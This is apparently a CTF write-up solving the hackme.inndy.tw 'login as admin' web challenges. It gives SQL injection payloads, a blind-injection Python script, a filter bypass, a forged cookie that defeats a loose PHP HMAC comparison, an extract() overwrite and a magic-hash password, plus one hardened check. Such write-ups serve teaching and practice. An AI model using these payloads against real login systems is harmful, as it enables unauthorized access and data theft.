Preface

I recently came across a rather interesting CTF OJ; here is the link:

https://hackme.inndy.tw/

It has quite a few web challenges. Here, in line with the challenge author's request, this article will not give out the flags directly, but it does include detailed analysis and the attack scripts.
0x08 login as admin 0.1

```
admin\' union select 1,2,3,4#
```

The second column (the `2`) is echoed back in the response. So construct:

```
admin\' union select 1,database(),3,4#
```

The database name is login_as_admin0. Therefore:

```
admin\' union select 1,(select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1),3,4#
```

This reveals the table name h1dden_f14g.

```
admin\' union select 1,(select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME=0x68316464656e5f66313467 limit 0,1),3,4#
```

This reveals the column name the_f14g.

```
admin\' union select 1,(select the_f14g from h1dden_f14g limit 0,1),3,4#
```

That yields the flag.
0x09 Login as Admin 1

Look at the filter:

```php
function safe_filter($str)
{
    $strl = strtolower($str);
    if (strstr($strl, ' ') || strstr($strl, '1=1') || strstr($strl, "''") ||
        strstr($strl, 'union select') || strstr($strl, 'select ')
    ) {
        return '';
    }
    return str_replace("'", "\\'", $str);
}
```

A space filter has been added, which `/**/` gets around. The filtering of `union select` and friends is also very loose (it only matches those exact substrings), so adapting the previous challenge's payload is enough:

```
admin\'/**/or/**/1/**/limit/**/0,1#
```
0x10 login as admin 1.2

This time `union select` no longer echoes anything, so I went with boolean-based blind injection.

It was painfully slow, though, so I did not run it to completion. The rough script is below; extracting the database name worked in testing.

```python
import requests

url = "https://hackme.inndy.tw/login1/index.php"
flag = ""

# One request per (character position, candidate byte); the login error
# message serves as the true/false oracle for each comparison.
for i in range(1, 100):
    for j in range(33, 127):
        payload = "admin\\'/**/or/**/(ascii(substr((select SCHEMA_NAME from information_schema.SCHEMATA limit 0,1),%s,1))=%s)/**/limit/**/0,1#" % (i, j)
        data = {
            "name": payload,
            "password": "1",
        }
        r = requests.post(url=url, data=data)
        # r.text (not r.content) so the comparison is str against str.
        if "You are not admin!" in r.text:
            flag += chr(j)
            print(flag)
            break
    else:
        # No candidate matched at this position: end of the string.
        break
```
0x11 login as admin 3

Key code:

```php
function load_user()
{
    global $secret, $error;
    if(empty($_COOKIE['user'])) {
        return null;
    }
    $unserialized = json_decode(base64_decode($_COOKIE['user']), true);
    $r = hash_hmac('sha512', $unserialized['data'], $secret) != $unserialized['sig'];
    if(hash_hmac('sha512', $unserialized['data'], $secret) != $unserialized['sig']) {
        $error = 'Invalid session';
        return false;
    }
    $data = json_decode($unserialized['data'], true);
    return [
        'name' => $data[0],
        'admin' => $data[1]
    ];
}
```

There is a loose comparison here:

```php
hash_hmac('sha512', $unserialized['data'], $secret) != $unserialized['sig']
```

We only need to supply `sig=0` to slip past the MAC check. So construct it as follows:

```php
function set_user()
{
    $user = ['admin', true];
    $data = json_encode($user);
    $sig = 0;
    $all = base64_encode(json_encode(['sig' => $sig, 'data' => $data]));
    echo $all;
}
set_user();
```

Add `user=eyJzaWciOjAsImRhdGEiOiJbXCJhZG1pblwiLHRydWVdIn0=` to the cookie, refresh, and the flag appears.
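As an added example (not the challenge's own code), here is this level's cookie check beside a hardened version: the forged cookie above is fed to both, together with a properly signed one. `$secret` is a placeholder, and the `verify_*` function names are mine.

```php
<?php
// Added example: the "login as admin 3" cookie check (loose !=) beside a
// hardened check. $secret is a placeholder for the server-side secret.
$secret = 'placeholder-server-secret';

// Vulnerable check, as on the page: loose != between the hex HMAC string
// and whatever JSON type the client put into "sig".
function verify_loose(string $cookie, string $secret): bool
{
    $u = json_decode(base64_decode($cookie), true);
    // On PHP 7.x a non-numeric string compared with int 0 is cast to 0,
    // so hexdigest != 0 is false and a forged sig of 0 is accepted.
    // PHP 8 compares int against non-numeric string as strings instead.
    return !(hash_hmac('sha512', $u['data'], $secret) != $u['sig']);
}

// Hardened check: insist on string types before comparing, then use
// hash_equals() for a constant-time, type-strict comparison.
function verify_strict(string $cookie, string $secret): bool
{
    $u = json_decode(base64_decode($cookie), true);
    if (!is_array($u) || !isset($u['data'], $u['sig'])
        || !is_string($u['data']) || !is_string($u['sig'])) {
        return false;
    }
    $expected = hash_hmac('sha512', $u['data'], $secret);
    return hash_equals($expected, $u['sig']);
}

// Forged cookie from the write-up: "sig" is the integer 0, not a MAC.
$forged = 'eyJzaWciOjAsImRhdGEiOiJbXCJhZG1pblwiLHRydWVdIn0=';

// Constructed, correctly signed cookie for a non-admin user.
$data = json_encode(['guest', false]);
$good = base64_encode(json_encode([
    'sig'  => hash_hmac('sha512', $data, $secret),
    'data' => $data,
]));

var_dump(verify_loose($forged, $secret));
var_dump(verify_strict($forged, $secret));
var_dump(verify_strict($good, $secret));
```

On PHP 7.x the loose check accepts the forged cookie while the strict check rejects it and accepts only the genuinely signed one; the type check before `hash_equals()` also matters because that function requires string arguments.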
0x12 login as admin 4

A logic flaw in the code: a username of `admin` succeeds on its own. Simply run

```
curl -d "name=admin" https://hackme.inndy.tw/login4/
```

to get the flag.
0x13 login as admin 6

Key code:

```php
if(!empty($_POST['data'])) {
    try {
        $data = json_decode($_POST['data'], true);
    } catch (Exception $e) {
        $data = [];
    }
    extract($data);
    if($users[$username] && strcmp($users[$username], $password) == 0) {
        $user = $username;
    }
}
```

The `extract($data);` call allows variable overwriting, since every key of the attacker-controlled JSON becomes a local variable, including `$users`. So we construct:

```
data = {"users":{"admin":"sky"},"username":"admin","password":"sky"}
```

which bypasses the check and logs in successfully.
0x14 login as admin 7

Loose md5 comparison with a hash beginning with `0e`. Use:

```
name = admin
password = QNKCDZO
```

and that is all it takes.